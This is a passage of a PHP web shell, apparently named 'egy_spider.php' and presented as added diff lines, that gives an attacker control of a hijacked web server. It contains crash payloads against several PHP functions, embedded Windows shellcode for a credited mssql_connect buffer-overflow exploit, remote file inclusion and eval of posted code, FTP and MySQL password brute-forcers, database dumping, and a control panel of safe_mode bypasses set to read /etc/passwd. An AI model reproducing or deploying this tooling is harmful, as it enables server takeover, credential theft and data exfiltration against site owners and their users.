chunk_split($a,$b,$c); + break; + case 'dos31': + if (extension_loaded("win32std") ) { win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );} + break; + case 'dos32': + if (extension_loaded( "iisfunc" ) ){ $buf_unicode = str_repeat( "A", 256 ); $eip_unicode = "\x41\x41"; iis_getservicestate( $buf_unicode . $eip_unicode );} + break; + case 'dos33': + $buff = str_repeat("\x41", 250);$get_EIP = "\x42\x42";$get_ESP = str_repeat("\x43", 100);$get_EBP = str_repeat("\x44", 100);ntuser_getuserlist($buff.$get_EIP.$get_ESP.$get_EBP); + break; + case 'dos34': + if (extension_loaded("bz2")){ $buff = str_repeat("a",1000); com_print_typeinfo($buff);} + break; + case 'dos35': + $a = str_repeat("/", 4199000); iconv(1, $a, 1); + break; + case 'dos36': + $a = str_repeat("/", 2991370); iconv_mime_decode_headers(0, 1, $a); + break; + case 'dos37': + $a = str_repeat("/", 3799000); iconv_mime_decode(1, 0, $a); + break; + case 'dos39': + sprintf("[%'A2147483646s]\n", "A"); + break; + break; + case 'dos40': +// PHP <= 4.4.6 mssql_connect() & mssql_pconnect() local buffer overflow +// poc exploit (and safe_mode bypass) +// windows 2000 sp3 en / seh overwrite +// by rgod +// site: http://egyspider.eu + + +// u can easily adjust for php5 +// this as my little contribute to MOPB + + +$____scode= +"\xeb\x1b". +"\x5b". +"\x31\xc0". +"\x50". +"\x31\xc0". +"\x88\x43\x59". +"\x53". +"\xbb\xca\x73\xe9\x77". //WinExec +"\xff\xd3". +"\x31\xc0". +"\x50". +"\xbb\x5c\xcf\xe9\x77". //ExitProcess +"\xff\xd3". +"\xe8\xe0\xff\xff\xff". +"\x63\x6d\x64". +"\x2e". +"\x65". +"\x78\x65". +"\x20\x2f". +"\x63\x20". +"start notepad & "; + + + $eip="\xdc\xf5\x12"; + $____suntzu=str_repeat("\x90",100); + $____suntzu.=$____scode; + $____suntzu.=str_repeat("a",2460 - strlen($____scode)); + $____suntzu.=$eip; + break; + case 'zend': + if(empty($_POST['zend'])){ +} else { + + +$dezend=$_POST['zend']; +include($_POST['zend']); +print_r($GLOBALS); +require_once("$dezend"); +echo "</textarea></p>"; +} +break; + case 'dos38': + $a = str_repeat("/", 9791999); iconv_strlen(1, $a); + break; +} +if ($_POST['cmd']=="php_eval"){ + $eval = @str_replace("<?","",$_POST['php_eval']); + $eval = @str_replace("?>","",$eval); + @eval($eval);} + + +if ($_POST['cmd']=="ftp_brute") + { + $suc = 0; + if($_POST['brute_method']=='passwd'){ + foreach($users as $user) + { + $connection = @ftp_connect($ftp_server,$ftp_port,10); + if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; } + else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } + @ftp_close($connection); + } + }else if(($_POST['brute_method']=='dic') && isset($_POST['ftp_login'])){ + foreach($users as $user) + { + $connection = @ftp_connect($ftp_server,$ftp_port,10); + if(@ftp_login($connection,$_POST['ftp_login'],$user)) { echo "[+] ".$_POST['ftp_login'].":$user - success\r\n"; $suc++; } + @ftp_close($connection); + } + } + echo "\r\n-------------------------------------\r\n"; + $count = count($users); + if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; } + echo $lang[$language.'_text97'].$count."\r\n"; + echo $lang[$language.'_text98'].$suc."\r\n"; + } + + +if ($_POST['cmd']=="db_brute") + { + $suc = 0; + if($_POST['brute_method']=='passwd'){ + foreach($users as $user) + { + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $user; + $sql->pass = $user; + if($sql->connect()) { echo "[+] $user:$user - success\r\n"; $suc++; } + } + if(isset($_POST['reverse'])) + { + foreach($users as $user) + { + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $user; + $sql->pass = strrev($user); + if($sql->connect()) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } + } + } + }else if(($_POST['brute_method']=='dic') && isset($_POST['mysql_l'])){ + foreach($users as $user) + { + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $user; + if($sql->connect()) { echo "[+] ".$_POST['mysql_l'].":$user - success\r\n"; $suc++; } + } + } + echo "\r\n-------------------------------------\r\n"; + $count = count($users); + if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; } + echo $lang[$language.'_text97'].$count."\r\n"; + echo $lang[$language.'_text98'].$suc."\r\n"; + } + + +if ($_POST['cmd']=="mysql_dump") + { + if(isset($_POST['dif'])) { morewrite($_POST['dif_name'], "mysql_dump\r\n"); } + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; } + else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; } + else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; } + else { + if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; } + else if(@is_writable($_POST['dif_name'])){ foreach($sql->dump as $v){ morewrite($_POST['dif_name'], $v."\r\n");} } + else { echo "[-] ERROR! Can't write in dump file"; } + } + } + + +echo "</textarea></div>"; +echo "</b>"; +echo "</td></tr></table>"; +echo "<table width=100% cellpadding=0 cellspacing=0>"; + + +function div_title($title, $id) +{ + return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>'; +} +function div($id) + { + if(isset($_COOKIE[$id]) && ($_COOKIE[$id]==0)) return '<div id="'.$id.'" style="display: none;">'; + $divid=array('id5','id6','id8','id9','id10','id11','id16','id24','id25','id26','id27','id28','id29','id33','id34','id35','id37','id38','id39'); + if(empty($_COOKIE[$id]) && @in_array($id,$divid)) return '<div id="'.$id.'" style="display: none;">'; + return '<div id="'.$id.'">'; + } + +if(!$safe_mode){ +echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts; +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +else{ +echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.'</div>'.$table_end1.$fe; + + + + + + + + + + + + + + +echo $fs.$table_up1.div_title($lang[$language.'_text210'],'id20').$table_up2.div('id20').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','zend',85,(!empty($_POST['zend'])?($_POST['zend']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'zend').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts; +echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +if($unix && @function_exists('touch')){ +echo $fs.$table_up1.div_title($lang[$language.'_text128'],'id5').$table_up2.div('id5').$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','file_name',40,(!empty($_POST['file_name'])?($_POST['file_name']):($_SERVER["SCRIPT_FILENAME"]))) +.ws(4)."<b>".$lang[$language.'_text26'].ws(2).$lang[$language.'_text59'].$arrow."</b>" +.ws(2).in('text','file_name_r',40,(!empty($_POST['file_name_r'])?($_POST['file_name_r']):("")))); +echo sr(15,"<b> or set Day".$arrow."</b>", +' +<select name="day" size="1"> +<option value="01">1</option> +<option value="02">2</option> +<option value="03">3</option> +<option value="04">4</option> +<option value="05">5</option> +<option value="06">6</option> +<option value="07">7</option> +<option value="08">8</option> +<option value="09">9</option> +<option value="10">10</option> +<option value="11">11</option> +<option value="12">12</option> +<option value="13">13</option> +<option value="14">14</option> +<option value="15">15</option> +<option value="16">16</option> +<option value="17">17</option> +<option value="18">18</option> +<option value="19">19</option> +<option value="20">20</option> +<option value="21">21</option> +<option value="22">22</option> +<option value="23">23</option> +<option value="24">24</option> +<option value="25">25</option> +<option value="26">26</option> +<option value="27">27</option> +<option value="28">28</option> +<option value="29">29</option> +<option value="30">30</option> +<option value="31">31</option> +</select>' +.ws(4)."<b>Month".$arrow."</b>" +.' +<select name="month" size="1"> +<option value="January">January</option> +<option value="February">February</option> +<option value="March">March</option> +<option value="April">April</option> +<option value="May">May</option> +<option value="June">June</option> +<option value="July">July</option> +<option value="August">August</option> +<option value="September">September</option> +<option value="October">October</option> +<option value="November">November</option> +<option value="December">December</option> +</select>' +.ws(4)."<b>Year".$arrow."</b>" +.' +<select name="year" size="1"> +<option value="1998">1998</option> +<option value="1999">1999</option> +<option value="2000">2000</option> +<option value="2001">2001</option> +<option value="2002">2002</option> +<option value="2003">2003</option> +<option value="2004">2004</option> +<option value="2005">2005</option> +<option value="2006">2006</option> +<option value="2006">2007</option> +<option value="2006">2008</option> +<option value="2006">2009</option> +<option value="2006">2010</option> +</select>' +.ws(4)."<b>Hour".$arrow."</b>" +.' +<select name="chasi" size="1"> +<option value="01">01</option> +<option value="02">02</option> +<option value="03">03</option> +<option value="04">04</option> +<option value="05">05</option> +<option value="06">06</option> +<option value="07">07</option> +<option value="08">08</option> +<option value="09">09</option> +<option value="10">10</option> +<option value="11">11</option> +<option value="12">12</option> +<option value="13">13</option> +<option value="14">14</option> +<option value="15">15</option> +<option value="16">16</option> +<option value="17">17</option> +<option value="18">18</option> +<option value="19">19</option> +<option value="20">20</option> +<option value="21">21</option> +<option value="22">22</option> +<option value="23">23</option> +<option value="24">24</option> +</select>' +.ws(4)."<b>Minute".$arrow."</b>" +.' +<select name="minutes" size="1"> +<option value="01">1</option> +<option value="02">2</option> +<option value="03">3</option> +<option value="04">4</option> +<option value="05">5</option> +<option value="06">6</option> +<option value="07">7</option> +<option value="08">8</option> +<option value="09">9</option> +<option value="10">10</option> +<option value="11">11</option> +<option value="12">12</option> +<option value="13">13</option> +<option value="14">14</option> +<option value="15">15</option> +<option value="16">16</option> +<option value="17">17</option> +<option value="18">18</option> +<option value="19">19</option> +<option value="20">20</option> +<option value="21">21</option> +<option value="22">22</option> +<option value="23">23</option> +<option value="24">24</option> +<option value="25">25</option> +<option value="26">26</option> +<option value="27">27</option> +<option value="28">28</option> +<option value="29">29</option> +<option value="30">30</option> +<option value="31">31</option> +<option value="32">32</option> +<option value="33">33</option> +<option value="34">34</option> +<option value="35">35</option> +<option value="36">36</option> +<option value="37">37</option> +<option value="38">38</option> +<option value="39">39</option> +<option value="40">40</option> +<option value="41">41</option> +<option value="42">42</option> +<option value="43">43</option> +<option value="44">44</option> +<option value="45">45</option> +<option value="46">46</option> +<option value="47">47</option> +<option value="48">48</option> +<option value="49">49</option> +<option value="50">50</option> +<option value="51">51</option> +<option value="52">52</option> +<option value="53">53</option> +<option value="54">54</option> +<option value="55">55</option> +<option value="56">56</option> +<option value="57">57</option> +<option value="58">58</option> +<option value="59">59</option> +</select>' +.ws(4)."<b>Second".$arrow."</b>" +.' +<select name="second" size="1"> +<option value="01">1</option> +<option value="02">2</option> +<option value="03">3</option> +<option value="04">4</option> +<option value="05">5</option> +<option value="06">6</option> +<option value="07">7</option> +<option value="08">8</option> +<option value="09">9</option> +<option value="10">10</option> +<option value="11">11</option> +<option value="12">12</option> +<option value="13">13</option> +<option value="14">14</option> +<option value="15">15</option> +<option value="16">16</option> +<option value="17">17</option> +<option value="18">18</option> +<option value="19">19</option> +<option value="20">20</option> +<option value="21">21</option> +<option value="22">22</option> +<option value="23">23</option> +<option value="24">24</option> +<option value="25">25</option> +<option value="26">26</option> +<option value="27">27</option> +<option value="28">28</option> +<option value="29">29</option> +<option value="30">30</option> +<option value="31">31</option> +<option value="32">32</option> +<option value="33">33</option> +<option value="34">34</option> +<option value="35">35</option> +<option value="36">36</option> +<option value="37">37</option> +<option value="38">38</option> +<option value="39">39</option> +<option value="40">40</option> +<option value="41">41</option> +<option value="42">42</option> +<option value="43">43</option> +<option value="44">44</option> +<option value="45">45</option> +<option value="46">46</option> +<option value="47">47</option> +<option value="48">48</option> +<option value="49">49</option> +<option value="50">50</option> +<option value="51">51</option> +<option value="52">52</option> +<option value="53">53</option> +<option value="54">54</option> +<option value="55">55</option> +<option value="56">56</option> +<option value="57">57</option> +<option value="58">58</option> +<option value="59">59</option> +</select>' +.in('hidden','cmd',0,'touch') +.in('hidden','dir',0,$dir) +.ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +$select=''; +if(@function_exists('chmod')){$select .= "<option value=mod>CHMOD</option>";} +if(@function_exists('chown')){$select .= "<option value=own>CHOWN</option>";} +if(@function_exists('chgrp')){$select .= "<option value=grp>CHGRP</option>";} +if($unix && $select){ +echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id6').$table_up2.div('id6').$ts; +echo @sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','param1',55,(($_POST['param1'])?($_POST['param1']):($_SERVER["SCRIPT_FILENAME"]))).ws(2)."<b>".$lang[$language.'_text68'].$arrow."</b>"."<select name=what>".$select."</select>".ws(4).in('text','param2 title="'.$lang[$language.'_text71'].'"',10,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +if(!$safe_mode){ +$aliases2 = ''; +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= "<option>$alias_name</option>"; + } +echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id5555').$table_up2.div('id5555').$ts; +echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id50').$table_up2.div('id50').$ts; +echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;$tempdir )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; + + +if(!$safe_mode && $unix){ +echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id9').$table_up2.div('id9').$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;$tempdir )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +} + + +echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id800').$table_up2.$font; +echo "<div align=center>".div('id800')."<textarea name=php_eval cols=100 rows=10>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("//unlink(\"egy_spider.php\");\r\n//readfile(\"/etc/passwd\");\r\n//file_get_content(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</div></div></font>"; +echo $table_end1.$fe; + + +echo $fs.$table_up1.div_title($lang[$language.'_text200'],'id520').$table_up2.div('id520').$ts; +echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','snn',85,'/etc/passwd').in('hidden','cmd',0,'copy').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text300'],'id500').$table_up2.div('id500').$ts; +echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','SnIpEr_SA',85,'/etc/passwd').in('hidden','cmd',0,'cURL').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text203'],'id510').$table_up2.div('id510').$ts; +echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','ini_restore',85,'/etc/passwd').in('hidden','cmd',0,'ini_restore').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text224'],'id800').$table_up2.div('id800').$ts; +echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>","<select size=\"1\" name=\"plugin\"><option value=\"plugin\">/etc/passwd</option></option></select>".in('hidden','cmd',0,'plugin').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text220'],'id900').$table_up2.div('id900').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','sym1p2',50,(!empty($_POST['sym1p2'])?($_POST['sym1p']):("/../../../"))).in('text','sym1p',50,(!empty($_POST['sym1p'])?($_POST['sym1p']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'sym1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text222'],'id980').$table_up2.div('id980').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'sym2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text204'],'id23').$table_up2.div('id23').$ts; +echo sr(15,"<b>".$lang[$language.'_text205'].$arrow."</b>",in('text','log',96,(!empty($_POST['log'])?($_POST['log']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'Paralyzing been planted and you can usefilename.php?ss=http://shell.txt?').ws(4).in('submit','submit',0,$lang[$language.'_butt65'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text207'],'id801').$table_up2.div('id801').$ts; +echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','glob',85,'/etc/').in('hidden','cmd',0,'glob').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text209'],'id5505').$table_up2.div('id5505').$ts; +echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','root',85,'/etc/').in('hidden','cmd',0,'root').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + + + + + +echo $fs.$table_up1.div_title($lang[$language.'_text151'],'id1221').$table_up2.div('id1221').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test_5_2_6',85,(!empty($_POST['test_5_2_6'])?($_POST['test_5_2_6']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test_5_2_6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + + +echo $fs.$table_up1.div_title($lang[$language.'_text161'],'id12211').$table_up2.div('id12211').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_5_2_6',85,(!empty($_POST['test2_5_2_6'])?($_POST['test2_5_2_6']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2_5_2_6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + + + + + + + + + + +echo $fs.$table_up1.div_title($lang[$language.'_text162'],'id9820').$table_up2.div('id9820').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'test_5_2_4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + + + + +echo $fs.$table_up1.div_title($lang[$language.'_text163'],'id9820').$table_up2.div('id9820').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'egy_perl').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + + + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id12').$table_up2.div('id12').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + + + + + + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text144'],'id40').$table_up2.div('id40').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test19_md',15,(!empty($_POST['test19_md'])?($_POST['test19_md']):("mysqli"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test19_ml',15,(!empty($_POST['test19_ml'])?($_POST['test19_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text39'].$arrow."</b>".in('text','test19_mp',15,(!empty($_POST['test19_mp'])?($_POST['test19_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test19_port',15,(!empty($_POST['test19_port'])?($_POST['test19_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test19_file',96,(!empty($_POST['test19_file'])?($_POST['test19_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test19').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id14').$table_up2.div('id14').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id15').$table_up2.div('id15').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id13').$table_up2.div('id13').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id21').$table_up2.div('id21').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text170'],'id2221').$table_up2.div('id2221').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','egy_4_2_0',96,(!empty($_POST['egy_4_2_0'])?($_POST['egy_4_2_0']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'egy_4_2_0').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + + + + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id22').$table_up2.div('id22').$ts; +echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8')); +echo sr(15,"<b>".$lang[$language.'_text117'].ws(2).$lang[$language.'_text60'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text120'],'id23').$table_up2.div('id23').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test9_file',96,(!empty($_POST['test9_file'])?($_POST['test9_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test9').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text121'],'id24').$table_up2.div('id24').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test10_file',96,(!empty($_POST['test10_file'])?($_POST['test10_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test10').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text122'],'id19').$table_up2.div('id19').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',96,(!empty($_POST['test_global'])?($_POST['test_global']):($dir))).in('hidden','cmd',0,'safe_dir').in('hidden','glob',0,'glob').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +{ +$select_n_rlph = "<select name='n_rlph'><option value=1>[ 1 ] (<<0,01 sec)</option><option value=2>[ 2 ] (<0,01 sec)</option>". +"<option 